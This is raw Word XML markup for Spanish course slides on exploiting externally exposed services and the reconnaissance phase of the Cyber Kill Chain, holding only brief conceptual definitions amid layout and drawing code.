                            <w:p w14:paraId="4AFE5F3B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="422"/>
                                <w:ind w:left="2351"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>3.2 Explotaci</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>ó</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>n de servicios expuestos externamente</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="07509D73" id="Group 394" o:spid="_x0000_s1200" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:104.4pt;z-index:15804928;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="121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">
                <v:shape id="Graphic 395" o:spid="_x0000_s1201" style="position:absolute;width:121920;height:13258;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1219200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" path="m12192000,l,,,1325879r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 396" o:spid="_x0000_s1202" type="#_x0000_t202" style="position:absolute;width:121920;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4AFE5F3B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="422"/>
                          <w:ind w:left="2351"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>3.2 Explotaci</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>ó</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>n de servicios expuestos externamente</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D204A0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E0831DD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="358"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B6DA68E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1237"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1741"/>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5390336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D5F535E" wp14:editId="5D0E2812">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>856183</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1113905</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3759835" cy="55943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559435"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="38623B61" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="881" w:lineRule="exact"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:sz w:val="88"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="88"/>
                              </w:rPr>
                              <w:t>Explotaci</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="88"/>
                              </w:rPr>
                              <w:t>ó</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="88"/>
                              </w:rPr>
                              <w:t>n Web</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="4D5F535E" id="Textbox 397" o:spid="_x0000_s1203" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:67.4pt;margin-top:-87.7pt;width:296.05pt;height:44.05pt;z-index:-179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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="38623B61" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="881" w:lineRule="exact"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:sz w:val="88"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="88"/>
                        </w:rPr>
                        <w:t>Explotaci</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="88"/>
                        </w:rPr>
                        <w:t>ó</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="88"/>
                        </w:rPr>
                        <w:t>n Web</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Es la explotación de los servicios en la web o red a los que se puede acceder fácilmente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789B630F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="329"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C342F9B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1237"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="735"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El adversario establece una conexión activa con el servidor expuesto externamente para identificar y aprovechar las lagunas existentes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79134291" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="264"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72EDBF37" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1364"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="644" w:lineRule="exact"/>
        <w:ind w:left="1364" w:hanging="487"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Adversario con conocimiento adecuado de la infraestructura de la organización objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CD9BA4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="644" w:lineRule="exact"/>
        <w:ind w:left="1237"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>y las tecnologías identifican el eslabón más débil y tratan de explotarlo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD8A364" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210111BD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1236"/>
        </w:tabs>
        <w:ind w:left="1236" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El servicio expuesto externamente puede existir en la Web o en la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41125468" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="773CDDF7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2060"/>
        </w:tabs>
        <w:spacing w:before="178"/>
        <w:ind w:left="2060" w:hanging="1407"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Recopilación de información</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751C31CE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="478"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55AFAD63" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1779"/>
        </w:tabs>
        <w:ind w:left="1779"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="485391360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="03241C1A" wp14:editId="1B56B198">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>7909559</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-358640</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4282440" cy="3849624"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>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184" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4282440" cy="3849624"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Es una jerga militar utilizada para obtener información sobre el enemigo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9B8B0D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="565"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3254A1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1704"/>
          <w:tab w:val="left" w:pos="1779"/>
        </w:tabs>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:right="7041" w:hanging="647"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">En Cyber Kill Chain esta fase se centra en la obtención de la información relacionada con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>nuestra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>máquina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>objetivo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE57556" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="561"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D33DB5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1779"/>
        </w:tabs>
        <w:ind w:left="1779"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Mediante Herramientas podemos recopilar toda la información importante relacionada con nuestro target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F31DF2"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399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED0BAEA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:line="985" w:lineRule="exact"/>
        <w:ind w:left="1179"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tipos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789F48FE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C03C00" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16CA8C11" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="736C2743" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="172B334C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="63"/>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7665152" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="67E7C4C6" wp14:editId="4174C562">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2087626</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>210381</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8522970" cy="3394710"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>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2970" cy="3394710"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8522970" cy="3394710"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="400" name="Graphic 400"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1856485" y="6350"/>
                            <a:ext cx="4636135" cy="1138555"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="4636135" h="1138555">
                                <a:moveTo>
                                  <a:pt x="4446270" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="189737" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="139303" y="6778"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="93980" y="25907"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="55578" y="55578"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25908" y="93979"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6778" y="139303"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="189737"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="948689"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6778" y="999124"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25907" y="1044447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="55578" y="1082849"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="93979" y="1112519"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="139303" y="1131649"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189737" y="1138427"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4446270" y="1138427"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4496704" y="1131649"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4542027" y="1112520"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4580429" y="1082849"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4610099" y="1044448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4629229" y="999124"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4636008" y="948689"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4636008" y="189737"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4629229" y="139303"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4610100" y="93980"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4580429" y="55578"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4542028" y="25908"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4496704" y="6778"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4446270" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="F1F1F1"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="401" name="Graphic 401"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1856485" y="6350"/>
                            <a:ext cx="4636135" cy="1138555"/>
                          </a:xfrm>
